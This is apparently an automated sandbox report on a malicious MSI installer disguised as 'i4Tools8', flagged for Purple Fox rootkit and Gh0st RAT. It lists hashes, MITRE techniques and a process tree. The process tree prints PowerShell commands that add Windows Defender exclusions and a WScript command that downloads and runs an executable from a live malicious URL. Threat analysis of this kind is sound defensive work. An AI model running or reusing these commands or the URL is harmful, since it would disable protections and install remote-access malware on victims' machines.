Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
133s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
14/09/2024, 08:11
Static task
static1
Behavioral task
behavioral1
Sample
zuixinaisi.msi
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
zuixinaisi.msi
Resource
win10v2004-20240802-en
General
-
Target
zuixinaisi.msi
-
Size
233.8MB
-
MD5
df0ddca33d18cef60dbfdad992a21ff3
-
SHA1
5db0a225c9713d93412d01c5df5398811e54d1e5
-
SHA256
8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b
-
SHA512
e217e0425cb0045bc15e4ed5e122e69bd4d6bee5170e961659aba94641305f6a274d648529ec577df41fcca383085cf31e9df66123e433dd2f6a408aa407ceda
-
SSDEEP
6291456:/LGfwiT1I66Fm7gHvhjLvuYGpyLit5vFls1D:/cT1I6CFbopyLiLvyD
Malware Config
Signatures
-
resource yara_rule behavioral2/memory/3484-131-0x0000000010000000-0x0000000010199000-memory.dmp purplefox_rootkit -
Gh0st RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3484-131-0x0000000010000000-0x0000000010199000-memory.dmp family_gh0strat -
Blocklisted process makes network request 1 IoCs
flow pid Process 31 2808 WScript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4808 powershell.exe 4564 powershell.exe -
Downloads MZ/PE file
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: instai.exe File opened (read-only) \??\K: instai.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: instai.exe File opened (read-only) \??\I: instai.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: instai.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: instai.exe File opened (read-only) \??\W: instai.exe File opened (read-only) \??\X: instai.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Q: instai.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\P: instai.exe File opened (read-only) \??\N: instai.exe File opened (read-only) \??\O: instai.exe File opened (read-only) \??\G: instai.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: instai.exe File opened (read-only) \??\M: instai.exe File opened (read-only) \??\S: instai.exe File opened (read-only) \??\Z: instai.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\T: instai.exe File opened (read-only) \??\V: instai.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: instai.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation MSID09F.tmp Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSID09F.tmp msiexec.exe File created C:\Windows\Installer\e58c766.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSICB0E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICC67.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSID06F.tmp msiexec.exe File created C:\Windows\Installer\e58c762.msi msiexec.exe File created C:\Windows\Installer\SourceHash{8E2E1E95-E5EE-4019-BB11-82391D9CA4BD} msiexec.exe File opened for modification C:\Windows\Installer\e58c762.msi msiexec.exe File opened for modification C:\Windows\Installer\MSICA03.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC86C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICAA0.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Executes dropped EXE 2 IoCs
pid Process 4924 MSID09F.tmp 3484 instai.exe -
Loads dropped DLL 5 IoCs
pid Process 112 MsiExec.exe 112 MsiExec.exe 112 MsiExec.exe 112 MsiExec.exe 112 MsiExec.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 4924 MSID09F.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 3040 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language instai.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSID09F.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f7b83aff83bcb26e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f7b83aff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f7b83aff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df7b83aff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f7b83aff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 instai.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz instai.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Modifies registry class 24 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387\59E1E2E8EE5E9104BB112893D1C94ADB msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\PackageName = "zuixinaisi.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Language = "2052" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Version = "16777216" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\ProductName = "i4Tools8" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\PackageCode = "D28B5C34E3416EF469BDECBAE57D671B" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB\MainFeature msiexec.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4652 msiexec.exe 4652 msiexec.exe 4808 powershell.exe 4808 powershell.exe 4808 powershell.exe 4564 powershell.exe 4564 powershell.exe 4564 powershell.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe 3484 instai.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3040 msiexec.exe Token: SeIncreaseQuotaPrivilege 3040 msiexec.exe Token: SeSecurityPrivilege 4652 msiexec.exe Token: SeCreateTokenPrivilege 3040 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3040 msiexec.exe Token: SeLockMemoryPrivilege 3040 msiexec.exe Token: SeIncreaseQuotaPrivilege 3040 msiexec.exe Token: SeMachineAccountPrivilege 3040 msiexec.exe Token: SeTcbPrivilege 3040 msiexec.exe Token: SeSecurityPrivilege 3040 msiexec.exe Token: SeTakeOwnershipPrivilege 3040 msiexec.exe Token: SeLoadDriverPrivilege 3040 msiexec.exe Token: SeSystemProfilePrivilege 3040 msiexec.exe Token: SeSystemtimePrivilege 3040 msiexec.exe Token: SeProfSingleProcessPrivilege 3040 msiexec.exe Token: SeIncBasePriorityPrivilege 3040 msiexec.exe Token: SeCreatePagefilePrivilege 3040 msiexec.exe Token: SeCreatePermanentPrivilege 3040 msiexec.exe Token: SeBackupPrivilege 3040 msiexec.exe Token: SeRestorePrivilege 3040 msiexec.exe Token: SeShutdownPrivilege 3040 msiexec.exe Token: SeDebugPrivilege 3040 msiexec.exe Token: SeAuditPrivilege 3040 msiexec.exe Token: SeSystemEnvironmentPrivilege 3040 msiexec.exe Token: SeChangeNotifyPrivilege 3040 msiexec.exe Token: SeRemoteShutdownPrivilege 3040 msiexec.exe Token: SeUndockPrivilege 3040 msiexec.exe Token: SeSyncAgentPrivilege 3040 msiexec.exe Token: SeEnableDelegationPrivilege 3040 msiexec.exe Token: SeManageVolumePrivilege 3040 msiexec.exe Token: SeImpersonatePrivilege 3040 msiexec.exe Token: SeCreateGlobalPrivilege 3040 msiexec.exe Token: SeBackupPrivilege 4544 vssvc.exe Token: SeRestorePrivilege 4544 vssvc.exe Token: SeAuditPrivilege 4544 vssvc.exe Token: SeBackupPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeDebugPrivilege 4808 powershell.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe Token: SeRestorePrivilege 4652 msiexec.exe Token: SeTakeOwnershipPrivilege 4652 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3040 msiexec.exe 3040 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3484 instai.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 4652 wrote to memory of 644 4652 msiexec.exe 107 PID 4652 wrote to memory of 644 4652 msiexec.exe 107 PID 4652 wrote to memory of 112 4652 msiexec.exe 109 PID 4652 wrote to memory of 112 4652 msiexec.exe 109 PID 4652 wrote to memory of 112 4652 msiexec.exe 109 PID 4652 wrote to memory of 4924 4652 msiexec.exe 110 PID 4652 wrote to memory of 4924 4652 msiexec.exe 110 PID 4652 wrote to memory of 4924 4652 msiexec.exe 110 PID 4924 wrote to memory of 5048 4924 MSID09F.tmp 111 PID 4924 wrote to memory of 5048 4924 MSID09F.tmp 111 PID 4924 wrote to memory of 5048 4924 MSID09F.tmp 111 PID 5048 wrote to memory of 4808 5048 cmd.exe 113 PID 5048 wrote to memory of 4808 5048 cmd.exe 113 PID 5048 wrote to memory of 4808 5048 cmd.exe 113 PID 5048 wrote to memory of 4564 5048 cmd.exe 115 PID 5048 wrote to memory of 4564 5048 cmd.exe 115 PID 5048 wrote to memory of 4564 5048 cmd.exe 115 PID 5048 wrote to memory of 2808 5048 cmd.exe 116 PID 5048 wrote to memory of 2808 5048 cmd.exe 116 PID 5048 wrote to memory of 2808 5048 cmd.exe 116 PID 5048 wrote to memory of 3484 5048 cmd.exe 119 PID 5048 wrote to memory of 3484 5048 cmd.exe 119 PID 5048 wrote to memory of 3484 5048 cmd.exe 119 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\zuixinaisi.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3040
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:644
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9781470C31F07C43A7C9ADE697C0B7042⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:112
-
-
C:\Windows\Installer\MSID09F.tmp"C:\Windows\Installer\MSID09F.tmp" /DontWait /RunAsAdmin /HideWindow "C:\ProgramData\i4Tools8.bat"2⤵
- Checks computer location settings
- Executes dropped EXE
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ""C:\ProgramData\i4Tools8.bat" "3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\ProgramData/instai.exe4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\ProgramData4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4564
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\DownloadFile.vbs" "https://vipusfsk.com/instai.exe" "C:/ProgramData\instai.exe"4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2808
-
-
C:\ProgramData\instai.exeC:/ProgramData/instai.exe4⤵
- Enumerates connected drives
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3484
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4544
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Event Triggered Execution
1Installer Packages
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1System Binary Proxy Execution
1Msiexec
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5b9e0793acf2cab3acdae1376e71b88fc
SHA1cbaa88dfa1b9026c3325d1d8b774786d9966a88d
SHA256fe9b8bb495ede5eafa0b17a114ef3e47e84dfec2b2c51117dd5b5218626573e1
SHA51220828ea6603ac4feb64bea2901b4f457e6a7a75c6c884d37a24f222536f5fa5a57086068737d805e9d0d14aedcdbae933b7d12c34b435ef8154036f461c2335e
-
Filesize
407B
MD52ff09853906bcaed82ddb57baca8eb1f
SHA195bf628e54a9eff2ac434fedc78193846def0139
SHA256591a03bf9ca7daa56aa6fec2e008a9a5aa68bb4f9f25ae23f905ab79de23d795
SHA512b6e7a58de13e6a3d760e769183921cc3658398c405d39f19cb4d26ab03b6898f3cf011391f1aaa9db9358d40131bd67e7a7df46cc8ff4298e4641232a078d740
-
Filesize
1KB
MD510e4067312ac3173043783d46c328a99
SHA1ec03017d71370619f553cd77b615ef6e2c781ff3
SHA256048183e68c0f8526ad8ce2e0c61ecbe50f42eacf990e8e4026254b154d0ba4bf
SHA5121f7799c14386c8bf3e65146f543e96052e809a55df9431b8b5baaef677218f870d35d963ef71f17cdfeb773f418a7e9a96ac68c851929ecd7a25e32954e35cd3
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5d14a1ef6ec7803a9a20c73d916e235b1
SHA15c6fec8d4531fb4240cd064197cdf05e53e09dd4
SHA2560d3979b1f41879e417cf467eea8639d5d409bbbba49b0dabe6c9f0e5ab053b71
SHA512339b6ad8db6b33912e4f50380047946a51e3e4ce6ea6332997467ae8322f96e5e8d501c44c26617716aad7ff3cff8ccdce24a18d78e92de4cd142b68727c96ad
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
587KB
MD5c7fbd5ee98e32a77edf1156db3fca622
SHA13e534fc55882e9fb940c9ae81e6f8a92a07125a0
SHA256e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6
SHA5128691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a
-
Filesize
419KB
MD5cac0eaeb267d81cf3fa968ee23a6af9d
SHA1cf6ae8e44fb4949d5f0b01b110eaba49d39270a2
SHA256f1dd0dd1e83b28ffa2ed30f46f98e94a4919ec1f4e9d33720354288b77153774
SHA5128edf9f733dda9000a6e2b70da61912dbc15f74c836d738391ceddcdff20f5b420a678450523cf331aa9bce90217aa92ac6e73d1880ae15c9842ccc7d3296f95b
-
Filesize
23.7MB
MD52097108849978c6e9f1fc140c871858c
SHA15ce14933e0a1d45745e636b96533638278746553
SHA256c30765d285fe45cab3ea9417df3fbdccfcf64da4b255595dfdf86b9e361881f6
SHA5122fcbe024e4d1bd41f0f1e4808f449877d9b22da9cc43afcddf6016e7b2a704a2d53bd27301cc24ad5335d1f3fe0c4a2dc901f7bb9a9e611c29b4701b542b2eda
-
\??\Volume{ff3ab8f7-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{5c1d19d8-22dc-4561-bf1b-3b776a81e0e6}_OnDiskSnapshotProp
Filesize6KB
MD5861e5be968c22b0376a9c435c6b16ebc
SHA19d2a0609ca3b055a3ac7d10500527aa093947a23
SHA25621404338dff1c4fd1cf709aacbba4c4e42ea436f8947f441710b37bd062bc52f
SHA51247adb6ad7a7dc3b483500bec0ca0a73713c985f077d7b93f3ebbf4dbe8fb8f78c97086034fe99803644fce32aba22eccfc3eae1493d0bb9cb108ac946c757dcd